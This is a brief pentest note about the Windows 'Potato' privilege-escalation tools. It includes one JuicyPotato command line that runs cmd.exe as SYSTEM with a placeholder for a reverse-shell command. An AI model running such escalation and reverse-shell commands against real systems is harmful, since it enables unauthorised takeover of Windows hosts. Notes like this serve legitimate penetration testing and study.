Potato

Potatoes πŸ₯” is a set of potatoes that can be used to escalate privileges from Windows Service Accounts to NT AUTHORITY/SYSTEM.

Juicy and Rogue don't work on all versions of Windows.


πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

PS> # You can pick any port for -l. It's for DCOM traffic. 
PS> .\JuicyPotato.exe -l any_port -p c:\windows\system32\cmd.exe -a "/c <reverse shell command>" -t *